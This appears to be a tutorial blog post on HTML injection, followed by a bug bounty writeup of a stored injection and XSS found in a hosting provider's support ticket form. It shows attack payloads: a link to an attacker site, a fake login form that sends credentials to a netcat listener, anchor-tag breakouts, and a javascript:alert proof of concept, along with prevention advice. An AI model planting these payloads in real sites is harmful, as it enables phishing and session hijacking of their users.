Deep Dive into HTML Injection and Bug Bounty Writeup

·

5 min read

What will be covered

  • What is HTML Injection?
  • How does HTML Injection occur?
  • How can we prevent HTML Injection?

1. HTML Injection is a bug allowing an attacker to inject pure HTML code into a web-application, this gives an attacker the ability to create defacements, hyper links and more! An example of a hyper link is shown below we use anchor tags and a href attribute creating the hyper link to the specified website or file etc in our case it creates a hyper link that takes the user to an attackers website.

<a href=https://attackerwebsite.com>Blog</a>

Blog

2. HTML Injection occurs via untrusted user input which means there is no sanitization for the user input, it also can occur when an attacker is able to control an input point and is able to inject arbitrary HTML code. For example we have a blog and on that blog we have a comment section allowing us to input text and add a comment for others to see.

blog-comment.JPG

image.png

The code shown below is a login form that has two input fields a username and password then a submit button it will send credentials entered here to our server that is listening on netcat this can be used as a social engineering attack tied with stored HTML Injection to steal credentials on a blog or something else in that relation.

<form name="login" action="$IP:Port">
<tr><td>Username:</td><td><input type="text" name="username"/></td></tr>
<tr><td>Password:</td><td><input type="Password" name="Password"/></td></tr>
</tables>
<input type="submit" value="Login"/>
</form>

image.png

3. Preventing HTML Injection is like preventing XSS, you want to sanitize/filter user input you can use something like PHP [HTMLSpecialChars] (w3schools.com/php/func_string_htmlspecialch..) a WAF (Web Application Firewall) is another great resource to invest in which will block any request that seems to have a character that is blocked in the firewall rules. The code below converts the predefined characters "<" (less than) and ">" (greater than) to HTML entities. (HTMLSpecialChars)

<?php
$str = "This is some <b>bold</b> text.";
echo htmlspecialchars($str);
?>

The HTML output of the code above will be (View Source):

<!DOCTYPE html>
<html>
<body>
This is some &lt;b&gt;bold&lt;/b&gt; text.
</body>
</html>

Stored HTML Injection Bug Bounty writeup

1. Firstly understanding the application, we need to understand the applications point and how it works for example if the application is there for writing blogs we would want to check the application for stuff like HTML Injection, XSS, Information Disclosure. In my case the application was a cloud base provider so they sold servers.

2. I was looking at there ticket system which allowed me to send a ticket for support for example and it had two fields with one drop down option a subject and message then priority firstly just filling the information out as usual and the data was being parsed in "JS". The request below shows the data being parsed.

image.png

POST /api/support_tickets/ HTTP/1.1
Host: thewebsite.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
X-CSRFToken: my X-CSRFToken
Content-Length: 100
Origin: thewebsite.com
Connection: close
Referer: thewebsite.com
Cookies:my cookies

{"subject":"This is an example subject",
"description":"This is an example message",
"priority":"low"}

3. Analysing the request we see the request is sent in a JSON Format, we also see its making a POST Request "/api/support_tickets" which if we change to "GET" gives us all of the tickets in a JSON format, but nothing to Interesting.

4. Fuzzing. Further on changing the request specifically the "description" to bold tags didn't give me a bold output for the query I entered. I decided to start messing with the "subject" this time I was trying stuff like "onmouseover=alert()> which wasn't working but I seen I was inside of anchor tag. inside of anchor tag.JPG

4. Trying to break out of the anchor tag, firstly I just tried something like an img tag with no src attribute and the onerror event handler for XSS but that wasn't going to escape the anchor tag, so the first basic method was just shutting the anchor tag off so I tried that.

</a>"onmouseover=alert()>

escaped.JPG

Which didn't display as a hyperlink nor did the closed anchor tag display which indicates I have successfully shut the anchor tag off meaning I now have the power to insert any HTML Code I want and if its not being sanitized I can control the input field creating a hyper link with a link to an attackers website as mentioned above with the anchor tags and hyper links.

4. Now we have shut off the anchor tag we can try adding some HTML Code into the input field which would hopefully not be sanitized, so first things I tried was adding an anchor tag with a href attribute going to Google and the code below is what I used.

</a><a href=https://www.google.com>Test</a>

I then checked by clicking "click" hyper link which I got redirected to Google, as shown below you can see inside of the dom my HTML Code is not being sanitized. I now wanted to pop an alert which I could do with the "javascript:alert(1)" so the full payload would be as shown below.

works.JPG

</a><a href=javascript:alert(1)>alert</a>

image.png

I reported it and got rewarded, I did chain it with XSS so my full chain was

HTML Injection > XSS > Cookie Stealing > Session Hijacking.

I hope you've learnt something today, be sure to follow our Twitter.

Thanks for reading

Follow us on twitter